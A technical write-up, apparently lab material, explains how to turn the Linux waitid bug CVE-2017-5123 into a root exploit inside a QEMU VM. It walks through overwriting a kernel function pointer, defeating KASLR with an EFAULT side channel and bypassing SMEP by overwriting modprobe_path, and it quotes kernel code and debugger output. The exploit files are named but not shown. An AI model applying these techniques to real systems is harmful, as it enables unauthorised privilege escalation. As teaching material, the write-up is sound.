A bug in the waitid syscall (waitid is a more general variant of waitpid):
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
}
if (!err) {
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user((short)info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
return err;
Efault:
user_access_end();
return -EFAULT;
}
The patch that fixed it:
commit 96ca579a1ecc943b75beba58bebb0356f6cc4b51
Author: Kees Cook <keescook@chromium.org>
Date: Mon Oct 9 11:36:52 2017 -0700
waitid(): Add missing access_ok() checks
Adds missing access_ok() checks.
CVE-2017-5123
Reported-by: Chris Salls <chrissalls5@gmail.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Acked-by: Al Viro <viro@zeniv.linux.org.uk>
Fixes: 4c48abe91be0 ("waitid(): switch copyout of siginfo to unsafe_put_user()")
Cc: stable@kernel.org # 4.13
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
diff --git a/kernel/exit.c b/kernel/exit.c
index f2cd53e92147..cf28528842bc 100644
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -1610,6 +1610,9 @@ SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
if (!infop)
return err;
+ if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
+ goto Efault;
+
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
So basically, the code uses unsafe_put_user to fill a struct siginfo structure in userspace, but omits the call to access_ok. This function verifies that a pointer, together with the range it covers, belongs to user space.
Since the check is missing, we can overwrite kernel memory by passing a kernel-space pointer to waitid. Our goal is to turn this into a privilege escalation exploit.
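To make the role of the missing check concrete, here is a simplified user-space model of what access_ok decides. It is only a sketch: the real kernel compares against the current task's address limit, and the constant MODEL_USER_LIMIT and the function name model_access_ok are our own, chosen to match x86_64 with 4-level paging.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumption: upper bound of user space on x86_64 with 4-level paging. */
#define MODEL_USER_LIMIT 0x00007ffffffff000ULL

/*
 * Simplified model of access_ok(): returns true only when the whole range
 * [addr, addr + size) lies below the user-space limit.
 */
bool model_access_ok(uint64_t addr, uint64_t size)
{
    if (size > MODEL_USER_LIMIT)
        return false;                       /* range cannot fit at all */
    return addr <= MODEL_USER_LIMIT - size; /* written to avoid overflow */
}
```

With this model, a pointer such as 0xffffffff8212cc40 is rejected, which is the behaviour the patch restores for infop.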
We have a qemu virtual machine that runs the vulnerable kernel.
The machine has 2 users: user:user and root:root. We want to log in as user and use the exploit to become root.
For debugging purposes we pass the -s parameter to qemu. This enables a gdbserver interface inside qemu, listening on port 1234. We then use the usual gdb to connect to this remote, which lets us debug the entire system, including the kernel.
$ gdb -nx -x gdbinit
GNU gdb (Debian 8.3-1) 8.3
Copyright (C) 2019 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) target remote:1234
Remote debugging using :1234
warning: No executable has been specified and target does not support
determining executable automatically. Try using the "file" command.
0xffffffff81959138 in ?? ()
=> 0xffffffff81959138: 65 44 8b 25 e8 0f 6b 7e mov r12d,DWORD PTR gs:[rip+0x7e6b0fe8] # 0xa128
(gdb) c
Continuing.
We can easily see that gdb has stopped somewhere inside the kernel, since addresses starting with ffffffff belong to kernel space.
In order to transfer files between the qemu vm and the host machine we’ll use the 9p filesystem. Qemu can take a directory from the host file system and use it as a 9p share that can be mounted from the guest vm.
In our case, we’ll use the vm/share directory, which will be mounted on /mnt/share inside the vm.
Host machine
adrians@snowgoose:~/cns/e2/vm/share$ touch file
adrians@snowgoose:~/cns/e2/vm/share$ ls -l
total 0
-rw-r--r-- 1 adrians adrians 0 Jan 1 21:46 file
adrians@snowgoose:~/cns/e2/vm/share$
QEMU machine
$ mount
/dev/root on / type ext4 (rw,relatime,data=ordered)
devtmpfs on /dev type devtmpfs (rw,relatime,size=119792k,nr_inodes=29948,mode=755)
proc on /proc type proc (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=666)
tmpfs on /dev/shm type tmpfs (rw,relatime,mode=777)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)
sysfs on /sys type sysfs (rw,relatime)
share on /mnt/share type 9p (rw,sync,dirsync,relatime,access=client,trans=virtio)
$ ls -l /mnt/share
total 0
-rw-r--r-- 1 user user 0 Jan 1 19:46 file
$
We can use the /proc/kallsyms entry to quickly find out the address of a kernel symbol, to aid us in the reverse engineering process.
$ grep sys_waitid /proc/kallsyms
ffffffff8105a970 T sys_waitid
ffffffff8105abb0 T compat_sys_waitid
$
Let’s take a closer look at what exactly we can write using this vulnerability.
The waitid syscall is used by a parent process that wants to wait for a child process to terminate. It is more versatile than wait and waitpid, combining the functionality of both. It allows us to wait for any child process, for one particular process identified by its pid, or for the processes in a process group identified by its pgid. Also, while wait and waitpid return the exit code of the child process, waitid fills a struct siginfo structure, which contains the exit code along with some other fields.
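For reference, this is what a perfectly legitimate use of waitid looks like from user space. The helper name wait_for_child_exit is ours; the sketch forks a child that exits with a chosen code and lets the kernel fill a siginfo_t for us.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Fork a child that exits immediately with `code`, reap it with waitid()
 * and let the kernel fill *out. Returns 0 on success, -1 on error.
 */
int wait_for_child_exit(int code, siginfo_t *out)
{
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(code);    /* child: terminate with the requested exit code */

    /* P_PID: wait for exactly this child; WEXITED: report termination */
    if (waitid(P_PID, (id_t)pid, out, WEXITED) != 0)
        return -1;

    return out->si_pid == pid ? 0 : -1;
}
```

After a successful call, si_signo, si_code, si_pid, si_uid and si_status describe the child that exited.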
First, the siginfo structure, defined in include/uapi/asm-generic/siginfo.h:
typedef struct siginfo {
int si_signo;
int si_errno;
int si_code;
union {
int _pad[SI_PAD_SIZE];
/* kill() */
struct {
__kernel_pid_t _pid; /* sender's pid */
__ARCH_SI_UID_T _uid; /* sender's uid */
} _kill;
/* POSIX.1b timers */
struct {
__kernel_timer_t _tid; /* timer id */
int _overrun; /* overrun count */
char _pad[sizeof( __ARCH_SI_UID_T) - sizeof(int)];
sigval_t _sigval; /* same as below */
int _sys_private; /* not to be passed to user */
} _timer;
/* POSIX.1b signals */
struct {
__kernel_pid_t _pid; /* sender's pid */
__ARCH_SI_UID_T _uid; /* sender's uid */
sigval_t _sigval;
} _rt;
/* SIGCHLD */
struct {
__kernel_pid_t _pid; /* which child */
__ARCH_SI_UID_T _uid; /* sender's uid */
int _status; /* exit code */
__ARCH_SI_CLOCK_T _utime;
__ARCH_SI_CLOCK_T _stime;
} _sigchld;
/* SIGILL, SIGFPE, SIGSEGV, SIGBUS */
struct {
void __user *_addr; /* faulting insn/memory ref. */
#ifdef __ARCH_SI_TRAPNO
int _trapno; /* TRAP # which caused the signal */
#endif
short _addr_lsb; /* LSB of the reported address */
union {
/* used when si_code=SEGV_BNDERR */
struct {
void __user *_lower;
void __user *_upper;
} _addr_bnd;
/* used when si_code=SEGV_PKUERR */
__u32 _pkey;
};
} _sigfault;
/* SIGPOLL */
struct {
__ARCH_SI_BAND_T _band; /* POLL_IN, POLL_OUT, POLL_MSG */
int _fd;
} _sigpoll;
/* SIGSYS */
struct {
void __user *_call_addr; /* calling user insn */
int _syscall; /* triggering system call number */
unsigned int _arch; /* AUDIT_ARCH_* of syscall */
} _sigsys;
} _sifields;
}
It looks quite complicated because it contains a lot of unions, but most of the fields aren’t actually used in our case. We can figure out the actual layout by inspecting the sys_waitid source code and by disassembling/decompiling the kernel binary.
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user((short)info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
and
__int64 __fastcall sys_waitid(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5)
{
...
if ( v5 )
{
*(_DWORD *)v5 = v8;
*(_DWORD *)(v5 + 4) = 0;
*(_DWORD *)(v5 + 8) = HIDWORD(v10);
*(_QWORD *)(v5 + 16) = v9;
*(_DWORD *)(v5 + 24) = v10;
}
return result;
}
In summary, the layout looks something like this:
struct siginfo {
int si_signo; /* offset 0 */
int si_errno; /* offset 4 */
int si_code; /* offset 8 */
int _pad; /* offset 12 */
int pid; /* offset 16 */
int uid; /* offset 20 */
int status; /* offset 24 */
}
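The offsets in this summary can be cross-checked from user space with offsetof. This is only a sketch: it inspects the C library's siginfo_t rather than the kernel's own definition, and it assumes a 64-bit Linux target where the two layouts agree. The helper names are ours.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stddef.h>

/* Byte offsets of the fields that waitid() writes, taken from the
 * user-space siginfo_t definition. */
size_t off_si_signo(void)  { return offsetof(siginfo_t, si_signo); }
size_t off_si_errno(void)  { return offsetof(siginfo_t, si_errno); }
size_t off_si_code(void)   { return offsetof(siginfo_t, si_code); }
size_t off_si_pid(void)    { return offsetof(siginfo_t, si_pid); }
size_t off_si_uid(void)    { return offsetof(siginfo_t, si_uid); }
size_t off_si_status(void) { return offsetof(siginfo_t, si_status); }
```

The gap between si_code (offset 8) and si_pid (offset 16) is the 4-byte padding that the decompiled code never writes.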
By inspecting the code and running some simple test cases we can distinguish 2 cases:
1. There isn’t any child process that has exited. In this case all the fields in the siginfo structure will be set to 0.
2. A child process has exited. In this case:
   - si_signo will be set to SIGCHLD (17)
   - si_errno will be set to 0
   - si_code will be set to CLD_EXITED (1)
   - pid will be set to the pid of the child process
   - uid will be set to the uid of the child process
   - status will be set to the exit code of the child process
We see that we cannot control most of the values. We can control pid, but its value is limited to 32768 (0x8000) by default, and we can also control status, but the exit code of a process is limited to a single byte (0 to 255).
We know that the kernel programming style uses a lot of function pointers. There are many structures that have function pointers inside: file_operations, inode_operations, etc.
If we can overwrite a function pointer with 0, we can make the kernel jump to address 0. Address 0 is not normally mapped, but we can use mmap to allocate memory at address 0 and fill it with the shellcode. Thus, we can make the kernel execute code that we control.
The problem is that many of these *_operations structures are in rodata.
const struct file_operations ext4_file_operations = {
.llseek = ext4_llseek,
.read_iter = ext4_file_read_iter,
.write_iter = ext4_file_write_iter,
...
Also, most of the kernel data structures are allocated on the heap, which makes it hard to find out their address.
We need to find a kernel function pointer which is in the .data section. A good candidate is:
int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
{
if (sk->sk_family == AF_INET)
return ip_recv_error(sk, msg, len, addr_len);
#if IS_ENABLED(CONFIG_IPV6)
if (sk->sk_family == AF_INET6)
return pingv6_ops.ipv6_recv_error(sk, msg, len, addr_len);
#endif
return -EINVAL;
}
where pingv6_ops is declared as
struct pingv6_ops pingv6_ops;
and has the type
struct pingv6_ops {
int (*ipv6_recv_error)(struct sock *sk, struct msghdr *msg, int len,
int *addr_len);
void (*ip6_datagram_recv_common_ctl)(struct sock *sk,
struct msghdr *msg,
struct sk_buff *skb);
void (*ip6_datagram_recv_specific_ctl)(struct sock *sk,
struct msghdr *msg,
struct sk_buff *skb);
int (*icmpv6_err_convert)(u8 type, u8 code, int *err);
void (*ipv6_icmp_error)(struct sock *sk, struct sk_buff *skb, int err,
__be16 port, u32 info, u8 *payload);
int (*ipv6_chk_addr)(struct net *net, const struct in6_addr *addr,
const struct net_device *dev, int strict);
};
So ipv6_recv_error is a function pointer inside the pingv6_ops structure, which is a global variable (in .data). We can double check by looking inside the kernel binary:
__int64 __fastcall inet_recv_error(__int64 a1)
{
__int16 v1; // r8
__int64 result; // rax
v1 = *(_WORD *)(a1 + 16);
if ( v1 == 2 )
return sub_FFFFFFFF817BA5D0();
result = 0xFFFFFFEALL;
if ( v1 == 10 )
result = qword_FFFFFFFF8212CC40();
return result;
}
We see that there is an indirect call from the qword at address 0xFFFFFFFF8212CC40, which is indeed in the .data section of the kernel.
Let’s see how inet_recv_error is called:
int tcp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int nonblock,
int flags, int *addr_len)
{
...
if (unlikely(flags & MSG_ERRQUEUE))
return inet_recv_error(sk, msg, len, addr_len);
tcp_recvmsg is ultimately reached from the recv syscall. So, if we call recv on an IPv6 TCP socket with the flag MSG_ERRQUEUE, that code will be reached.
A simple exploit that will crash the kernel is in exploit_crash (run the vm with run.sh). Another exploit that makes the kernel execute an int 3 instruction is in exploit_int3 (run the vm with run.sh).
We need a shellcode that changes the uid of the current task to 0 (root). Normally, the uid is in a cred structure which is stored inside task_struct.
struct task_struct {
...
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
...
and
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
...
But the easiest way to change the uid of the current task to 0 is to call commit_creds(prepare_kernel_cred(NULL)):
- prepare_kernel_cred(NULL) allocates a new cred structure with all the ids set to 0
- commit_creds takes a cred structure and installs it for the current task
An exploit with the complete shellcode is in exploit_mmap_zero (run the vm with run.sh).
mmap_min_addr is a setting in /proc (/proc/sys/vm/mmap_min_addr). It specifies the minimum address that can be allocated via mmap. If this value is greater than 0, our previous exploit won’t work, since we can’t allocate memory at address 0 anymore.
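Before attempting a mapping at address 0 it is easy to check the setting from user space. The sketch below uses two helper names of our own, read_sysctl_value and null_page_mapping_blocked; it reads a single unsigned decimal number from a procfs-style file and interprets it.

```c
#include <stdio.h>

/*
 * Read one unsigned decimal value from a procfs-style file.
 * Returns the value, or -1 if the file cannot be opened or parsed.
 */
long long read_sysctl_value(const char *path)
{
    unsigned long long value = 0;
    int parsed;
    FILE *f = fopen(path, "r");

    if (!f)
        return -1;
    parsed = fscanf(f, "%llu", &value);
    fclose(f);
    return parsed == 1 ? (long long)value : -1;
}

/* Nonzero when an unprivileged mapping at address 0 would be refused. */
int null_page_mapping_blocked(long long min_addr)
{
    return min_addr > 0;
}
```

A typical call would be null_page_mapping_blocked(read_sysctl_value("/proc/sys/vm/mmap_min_addr")); note that a read error (-1) is reported as "not blocked" here, so a caller that cares should check for -1 first.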
Run the vm with ./run_mmap_min.sh and try the previous exploit:
$ /mnt/share/exploit_mmap_zero
mmap failed
To bypass this, we remember that waitid can write some non-zero values as well, provided that our process has a child process that has exited.
We’ll use the fact that si_code will be set to CLD_EXITED (1) in order to overwrite pingv6_ops.ipv6_recv_error with a non-zero value.
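si_errno and si_code are adjacent 4-byte values. If we consider them together as a little-endian 8-byte value, with si_errno (0) in the low half and si_code (1) in the high half, the value will be 0x100000000, which is a user-space address that we are still allowed to map.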
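The arithmetic can be checked with a few lines of C. The function name combine_errno_code is ours, and the sketch assumes a little-endian machine such as x86_64: it lays the two 4-byte fields out in memory the same way the structure does and reads them back as one 8-byte value.

```c
#include <stdint.h>
#include <string.h>

/*
 * Place si_errno at the lower address and si_code right after it, as in
 * struct siginfo, then reinterpret the 8 bytes as a single 64-bit value.
 * The result depends on host byte order (little-endian assumed).
 */
uint64_t combine_errno_code(int32_t si_errno_val, int32_t si_code_val)
{
    unsigned char bytes[8];
    uint64_t value;

    memcpy(bytes, &si_errno_val, 4);     /* offset 4 in siginfo */
    memcpy(bytes + 4, &si_code_val, 4);  /* offset 8 in siginfo */
    memcpy(&value, bytes, sizeof(value));
    return value;
}
```

With si_errno = 0 and si_code = CLD_EXITED = 1 this yields 0x100000000, the value that ends up in the 8-byte function pointer when the pointer is aligned with si_errno.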
The exploit is in exploit_mmap_non_zero (run the vm with run_mmap_min.sh).
KASLR randomizes the kernel base address at every boot. This prevents us from knowing the address of pingv6_ops.ipv6_recv_error in order to overwrite it.
Besides KASLR there’s also another setting called kptr_restrict (/proc/sys/kernel/kptr_restrict). This setting hides from regular users the kernel pointers that the kernel prints with the %pK format specifier. Otherwise it would be trivial to break KASLR by looking in /proc/kallsyms.
When kptr_restrict is enabled, all pointers will be seen as 0:
$ grep sys_waitid /proc/kallsyms
0000000000000000 T sys_waitid
0000000000000000 T compat_sys_waitid
To bypass KASLR we notice that the waitid syscall has a side channel. If we provide an invalid address the syscall will fail with EFAULT. Therefore, we can figure out the kernel base address by starting with 0xffffffff81000000 and incrementing the address until waitid no longer returns EFAULT.
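The scan itself is just a linear search. The sketch below keeps the probe abstract: first_non_faulting and probe_fn are names of our own, and simulated_probe is a stand-in that only pretends the first accepted address is 0xffffffff91000000, so the loop can be tried without a vulnerable kernel. The 2 MiB step used in the usage note is an assumption about the KASLR alignment, not something stated above.

```c
#include <stddef.h>
#include <stdint.h>

/* A probe returns nonzero when a write to addr did NOT fail with EFAULT. */
typedef int (*probe_fn)(uint64_t addr);

/*
 * Walk upwards from `start` in increments of `step` and return the first
 * address accepted by `probe`, or 0 if none is found within `max_steps`.
 */
uint64_t first_non_faulting(uint64_t start, uint64_t step,
                            size_t max_steps, probe_fn probe)
{
    for (size_t i = 0; i < max_steps; i++) {
        uint64_t addr = start + (uint64_t)i * step;

        if (probe(addr))
            return addr;
    }
    return 0;
}

/* Stand-in probe for illustration only: simulates a boot in which the
 * first writable address is 0xffffffff91000000. */
int simulated_probe(uint64_t addr)
{
    return addr >= 0xffffffff91000000ULL;
}
```

Calling first_non_faulting(0xffffffff81000000, 0x200000, 512, simulated_probe) walks 128 steps before the simulated probe accepts an address.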
There is a simple test program in exploit_kaslr. Run the vm with ./run_kaslr.sh.
Welcome to Buildroot
buildroot login: root
Password:
# grep _stext /proc/kallsyms
ffffffff90200000 T _stext
#
Welcome to Buildroot
buildroot login: user
Password:
$ /mnt/share/test_leak
kbase = ffffffff91000000
We obtain 0xffffffff91000000, while the real value is 0xffffffff90200000, a difference of 0xe00000. This can be explained by looking at the output of readelf on the kernel binary.
$ readelf -SW vmlinux
There are 30 section headers, starting at offset 0x1493140:
Section Headers:
[Nr] Name Type Address Off Size ES Flg Lk Inf Al
[ 0] NULL 0000000000000000 000000 000000 00 0 0 0
[ 1] .text PROGBITS ffffffff81000000 200000 95d9f7 00 AX 0 0 4096
[ 2] .notes NOTE ffffffff8195d9f8 b5d9f8 000024 00 A 0 0 4
[ 3] __ex_table PROGBITS ffffffff8195da20 b5da20 003390 00 A 0 0 4
[ 4] .rodata PROGBITS ffffffff81a00000 c00000 2a0016 00 WA 0 0 4096
[ 5] .pci_fixup PROGBITS ffffffff81ca0018 ea0018 003c30 00 A 0 0 8
[ 6] .tracedata PROGBITS ffffffff81ca3c48 ea3c48 000078 00 A 0 0 1
[ 7] __ksymtab PROGBITS ffffffff81ca3cc0 ea3cc0 015760 00 A 0 0 16
[ 8] __ksymtab_gpl PROGBITS ffffffff81cb9420 eb9420 011540 00 A 0 0 16
[ 9] __ksymtab_strings PROGBITS ffffffff81cca960 eca960 02fefb 00 A 0 0 1
[10] __param PROGBITS ffffffff81cfa860 efa860 0047e0 00 A 0 0 8
[11] __modver PROGBITS ffffffff81cff040 eff040 000fc0 00 A 0 0 8
[12] .data PROGBITS ffffffff81e00000 1000000 14b6c0 00 WA 0 0 4096
[13] __bug_table PROGBITS ffffffff81f4b6c0 114b6c0 015480 00 WA 0 0 1
[14] .vvar PROGBITS ffffffff81f61000 1161000 001000 00 WA 0 0 16
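We see that .data starts at ffffffff81e00000, which is exactly 0xe00000 past the start of .text. All the other sections before that are read-only. So, when trying to write to an address inside those sections, waitid fails because of the permissions, and the first address that succeeds is the start of .data rather than the kernel base.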
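Turning the leaked address into a usable base is then plain arithmetic. In this sketch the two link-time addresses come from the readelf output above, while the helper names text_base_from_data and runtime_addr are ours.

```c
#include <stdint.h>

#define LINK_TEXT_ADDR 0xffffffff81000000ULL /* .text address in vmlinux */
#define LINK_DATA_ADDR 0xffffffff81e00000ULL /* .data address in vmlinux */

/* The scan finds the start of .data; subtract the fixed .text-to-.data
 * distance to recover the randomized base of .text. */
uint64_t text_base_from_data(uint64_t runtime_data_addr)
{
    return runtime_data_addr - (LINK_DATA_ADDR - LINK_TEXT_ADDR);
}

/* Relocate any link-time address using the recovered .text base. */
uint64_t runtime_addr(uint64_t runtime_text_base, uint64_t link_addr)
{
    return runtime_text_base + (link_addr - LINK_TEXT_ADDR);
}
```

For the boot shown above, text_base_from_data(0xffffffff91000000) gives 0xffffffff90200000, matching _stext, and runtime_addr can then relocate the function pointer we saw at 0xFFFFFFFF8212CC40.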
The full exploit is in exploit_kaslr. Run the vm with ./run_kaslr.sh.
SMEP - supervisor mode execution prevention - prevents the kernel from executing code from userspace pages
SMAP - supervisor mode access prevention - prevents the kernel from reading/writing data from/to userspace pages
So, our previous exploit doesn’t work anymore, since we are executing shellcode from userspace.
./run_smep.sh
$ /mnt/share/exploit_kaslr
kbase = 0xffffffff9ea00000
[ 15.348793] unable to execute userspace code (SMEP?) (uid: 1000)
[ 15.349062] BUG: unable to handle kernel paging request at 0000000100000000
[ 15.349751] IP: 0x100000000
We’ll have to use a so-called “data-oriented attack”.
There is a string called modprobe_path in kernel/kmod.c:
char modprobe_path[KMOD_PATH_LEN] = "/sbin/modprobe";
This is used by the function call_modprobe:
static int call_modprobe(char *module_name, int wait)
{
struct subprocess_info *info;
static char *envp[] = {
"HOME=/",
"TERM=linux",
"PATH=/sbin:/usr/sbin:/bin:/usr/bin",
NULL
};
char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
if (!argv)
goto out;
module_name = kstrdup(module_name, GFP_KERNEL);
if (!module_name)
goto free_argv;
argv[0] = modprobe_path;
argv[1] = "-q";
argv[2] = "--";
argv[3] = module_name; /* check free_modprobe_argv() */
argv[4] = NULL;
info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
NULL, free_modprobe_argv, NULL);
if (!info)
goto free_module_name;
return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
free_module_name:
kfree(module_name);
free_argv:
kfree(argv);
out:
return -ENOMEM;
}
call_modprobe, in turn, is called from __request_module. This basically allows loading kernel modules from inside the kernel. It does this by executing the binary specified in the modprobe_path string.
One place where __request_module is used is in search_binary_handler in fs/exec.c:
int search_binary_handler(struct linux_binprm *bprm)
{
...
if (need_retry) {
if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
printable(bprm->buf[2]) && printable(bprm->buf[3]))
return retval;
if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
return retval;
need_retry = false;
goto retry;
}
return retval;
}
This is basically a feature that allows custom executable formats. If no existing handler accepts the file and at least one of its first 4 bytes is not printable, the kernel will turn bytes 2 and 3 into an unsigned short, and then try to load a module called “binfmt-XXXX”, where XXXX is that value as 4 hex digits.
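The decision can be mirrored in user space to see which module name a given file header would produce. This is a sketch, not kernel code: is_printable follows our reading of the printable() helper in fs/exec.c (tab, newline, or 0x20 to 0x7e), and binfmt_module_name is a name of our own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* User-space mirror of the kernel's printable() test (assumed definition). */
int is_printable(unsigned char c)
{
    return c == '\t' || c == '\n' || (c >= 0x20 && c <= 0x7e);
}

/*
 * Given the first 4 bytes of a file, write the module name the kernel
 * would request into `out` and return 1. Returns 0 when all 4 bytes are
 * printable, in which case no module is requested.
 */
int binfmt_module_name(const unsigned char buf[4], char *out, size_t out_len)
{
    unsigned short magic;

    if (is_printable(buf[0]) && is_printable(buf[1]) &&
        is_printable(buf[2]) && is_printable(buf[3]))
        return 0;

    memcpy(&magic, buf + 2, sizeof(magic)); /* bytes 2 and 3, host order */
    snprintf(out, out_len, "binfmt-%04x", (unsigned)magic);
    return 1;
}
```

A header of four 0xff bytes therefore maps to the name binfmt-ffff, while a script starting with "#!/b" never reaches the module request.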
To exploit this, we will modify the string inside modprobe_path to point to a file that we control. Then we create a dummy executable file which contains 4 bytes with a value greater than 0x80. Upon executing this file, the kernel will eventually reach __request_module and will call our file with root privileges.
modprobe_path
We’ll have to use multiple calls to waitid to overwrite modprobe_path byte by byte. However, there is a small problem.
Let’s say we want to use the status field, which we can control (it’s the exit code of the child process).
Because most of the bytes in the structure are 0, a subsequent use of waitid will overwrite the previous bytes, thus making it hard to achieve a multi-byte write.
However, if we take a closer look, we have the fields _pad and pid which are next to each other. _pad is unused and will be left as it is, and pid is the pid of the child process, of which we can control 2 bytes.
In total, we can achieve a 6 byte write, like this:
We’ll thus be able to overwrite modprobe_path with a value like tmp/AA, which we can control.
The exploit is in ./exploit_smep.